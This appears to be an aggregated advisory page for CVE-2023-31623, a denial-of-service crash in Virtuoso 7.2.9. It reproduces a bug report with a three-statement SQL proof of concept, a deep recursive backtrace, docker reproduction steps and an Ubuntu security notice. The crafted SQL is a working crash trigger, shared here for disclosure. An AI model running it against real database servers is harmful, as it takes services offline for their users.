Headline
CVE-2023-31623: virtuoso 7.2.9 crashed at mp_box_copy · Issue #1131 · openlink/virtuoso-opensource
An issue in the mp_box_copy component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE t1( x INTEGER PRIMARY KEY, k VARCHAR ); CREATE VIEW t1 AS SELECT k, k FROM t1; UPDATE t1 SET k = k-1 WHERE k > 100 AND x = 128;
backtrace:
#0 0xe086e9 (mp_box_copy+0x9) #1 0xe08dd0 (mp_box_copy_tree+0xc0) #2 0x815b3a (sqlc_col_to_view_scope+0x4fa) #3 0x815ee2 (sqlc_exp_to_view_scope+0x162) #4 0x815ee2 (sqlc_exp_to_view_scope+0x162) #5 0x815ee2 (sqlc_exp_to_view_scope+0x162) #6 0x815ee2 (sqlc_exp_to_view_scope+0x162) #7 0x815ee2 (sqlc_exp_to_view_scope+0x162) #8 0x815ee2 (sqlc_exp_to_view_scope+0x162) #9 0x815ee2 (sqlc_exp_to_view_scope+0x162) #10 0x815ee2 (sqlc_exp_to_view_scope+0x162) #11 0x815ee2 (sqlc_exp_to_view_scope+0x162) #12 0x815ee2 (sqlc_exp_to_view_scope+0x162) … #1045 0x815ee2 (sqlc_exp_to_view_scope+0x162) #1046 0x815ee2 (sqlc_exp_to_view_scope+0x162) #1047 0x815ee2 (sqlc_exp_to_view_scope+0x162) #1048 0x817c90 (sqlc_update_view+0xa60) #1049 0x7ddad0 (sqlc_update_searched+0xbd0) #1050 0x817cd1 (sqlc_update_view+0xaa1) #1051 0x7ddad0 (sqlc_update_searched+0xbd0) #1052 0x817cd1 (sqlc_update_view+0xaa1) #1053 0x7ddad0 (sqlc_update_searched+0xbd0) #1054 0x817cd1 (sqlc_update_view+0xaa1) #1055 0x7ddad0 (sqlc_update_searched+0xbd0) #1056 0x817cd1 (sqlc_update_view+0xaa1) … #3132 0x817cd1 (sqlc_update_view+0xaa1) #3133 0x7ddad0 (sqlc_update_searched+0xbd0) #3134 0x817cd1 (sqlc_update_view+0xaa1) #3135 0x7ddad0 (sqlc_update_searched+0xbd0) #3136 0x6b7212 (sql_stmt_comp+0x812) #3137 0x6ba122 (sql_compile_1+0x1a62) #3138 0x7c8cd0 (stmt_set_query+0x340) #3139 0x7cabc2 (sf_sql_execute+0x922) #3140 0x7cbf4e (sf_sql_execute_w+0x17e) #3141 0x7d4c0d (sf_sql_execute_wrapper+0x3d) #3142 0xe1f01c (future_wrapper+0x3fc) #3143 0xe2691e (_thread_boot+0x11e) #3144 0x7f2025e0d609 (start_thread+0xd9) #3145 0x7f2025bdd133 (clone+0x43)
ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
docker exec -i virtdb_test isql 1111 dba < “/tmp/test.sql”
Related news
Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.